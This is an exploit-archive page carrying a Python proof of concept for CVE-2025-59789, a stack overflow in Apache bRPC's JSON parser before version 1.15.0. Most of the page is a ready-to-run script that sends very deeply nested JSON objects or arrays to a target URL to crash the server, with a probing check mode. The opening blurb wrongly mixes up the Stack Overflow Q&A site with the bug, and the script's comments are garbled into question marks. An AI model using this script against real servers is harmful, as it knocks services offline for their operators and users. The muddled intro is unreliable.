Apache bRPC is a high-performance, C++ RPC framework from Apache, Apache bRPC is a high-performance, C++ RPC framework from Apache, widely used for building distributed systems and microservices.
For developers working with bRPC, Stack Overflow serves as an invaluable community-driven Q&A platform. Users frequently post questions tagged `apache-brpc`, `c++`, or `rpc` to seek solutions for various challenges.
Typical queries include:
* Setup and configuration issues.
* Implementing specific features or protocols (e.g., HTTP, gRPC).
* Debugging runtime errors or performance bottlenecks.
* Understanding best practices and integration patterns.
The platform enables peer-to-peer support, allowing experienced bRPC users to share knowledge and help others overcome hurdles. This collective intelligence significantly aids in troubleshooting, learning, and fostering broader adoption of the framework within the developer community.
=============================================================================================================================================
| # Title : Apache bRPC prior to 1.15.0 Stack Overflow via Deep Recursive JSON |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://brpc.apache.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/212248/ & CVE-2025-59789
[+] Summary : Critical stack overflow vulnerability in Apache bRPC's JSON parser that allows remote attackers to crash servers via specially crafted deep recursive JSON data.
[+] POC : python poc.py
#!/usr/bin/env python3
"""
Proof of Concept (PoC) for CVE-2025-59789
by indoushka
"""
import json
import requests
import sys
def generate_deep_nested_json(depth=1000):
"""
????? JSON ?? ???? ??????? ???? ????
"""
data = {}
current = data
for i in range(depth):
current["nested"] = {}
current = current["nested"]
current["value"] = "exploit"
return json.dumps(data)
def generate_deep_array_json(depth=1000):
"""
????? JSON ?? ?????? ??????? ???? ????
"""
data = []
current = data
for i in range(depth):
new_array = []
current.append(new_array)
current = new_array
current.append("exploit")
return json.dumps(data)
def send_exploit(target_url, depth=10000, exploit_type="object"):
"""
????? ?????? JSON ??????? ???? ???????? ??????
Args:
target_url: ????? URL ?????? ???????
depth: ??? ??????? (???? ??? ?????? ??? ?????? ?????? ?? stack overflow)
exploit_type: ??? ???????? ("object" ?? "array")
"""
print(f"[*] ????? ???? Stack Overflow ???: {target_url}")
print(f"[*] ??? ?????????: {exploit_type}")
print(f"[*] ??? ???????: {depth}")
# ????? ?????? JSON ???????
if exploit_type == "object":
print("[*] ????? JSON ?? ?????? ???????...")
payload = generate_deep_nested_json(depth)
else:
print("[*] ????? JSON ?? ??????? ???????...")
payload = generate_deep_array_json(depth)
print(f"[*] ??? ???????: {len(payload)} ????")
# ????? ???????? (????? ??? ????? ???????? ??????)
headers = {
'Content-Type': 'application/json',
'User-Agent': 'CVE-2025-59789-PoC'
}
try:
print("[*] ????? ?????...")
response = requests.post(
target_url,
data=payload,
headers=headers,
timeout=30
)
print(f"[*] ??????? ??????: {response.status_code}")
# ?????? ?? ????? ??????
if response.status_code >= 500:
print("[+] ???? ?????! ?? ???? ?????? ?? ????")
else:
print("[-] ?????? ?? ???? ??????")
except requests.exceptions.ConnectionError:
print("[+] ????! ??? ??????? ??????? - ???? ???? ???? stack overflow")
except requests.exceptions.ReadTimeout:
print("[+] ???? ?????! ????? ???? ?????? - ???? ?? ?? ???? ????")
except Exception as e:
print(f"[!] ???: {e}")
def check_vulnerability(target_url):
"""
?????? ?? ???? ?????? ?????? ??? ????? ?????
"""
print("[*] ?????? ?? ???? ??????...")
# ??? ??? ???????? (??? ?? 100)
safe_depth = 50
safe_payload = generate_deep_nested_json(safe_depth)
headers = {
'Content-Type': 'application/json'
}
try:
response = requests.post(
target_url,
data=safe_payload,
headers=headers,
timeout=10
)
if response.status_code == 200:
print("[*] ?????? ?????? ???????? ????????? ??????")
# ?????? ???? ???? (200 - ??? ?? ???? ?? ??????? ??????)
dangerous_depth = 200
dangerous_payload = generate_deep_nested_json(dangerous_depth)
try:
response2 = requests.post(
target_url,
data=dangerous_payload,
headers=headers,
timeout=10
)
if response2.status_code == 200:
print("[-] ?????? ???? ??? 200 - ???? ??? ????")
else:
print("[+] ?????? ???? ??? 200 - ???? ?? ??????")
except:
print("[+] ?????? ?? ???? ???????")
except Exception as e:
print(f"[!] ??? ?? ??????: {e}")
if __name__ == "__main__":
print("=" * 60)
print("PoC for CVE-2025-59789 - Apache bRPC Stack Overflow")
print("Affected: bRPC < 1.15.0 with json2pb component")
print("=" * 60)
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <target_url> [depth] [type]")
print(f"Example: {sys.argv[0]} http://localhost:8080/api 10000 object")
print(f"Example: {sys.argv[0]} http://localhost:8080/api 5000 array")
print(f"Check: {sys.argv[0]} http://localhost:8080/api check")
sys.exit(1)
target_url = sys.argv[1]
if len(sys.argv) > 2 and sys.argv[2] == "check":
check_vulnerability(target_url)
else:
depth = int(sys.argv[2]) if len(sys.argv) > 2 else 10000
exploit_type = sys.argv[3] if len(sys.argv) > 3 else "object"
if depth > 100000:
print("[!] ?????: ??? ???? ???? ?? ????? ?? ????? ?????? ???????")
confirm = input("[?] ?? ???? ????????? (y/n): ")
if confirm.lower() != 'y':
sys.exit(0)
send_exploit(target_url, depth, exploit_type)
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
Apache bRPC Stack Overflow
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 176
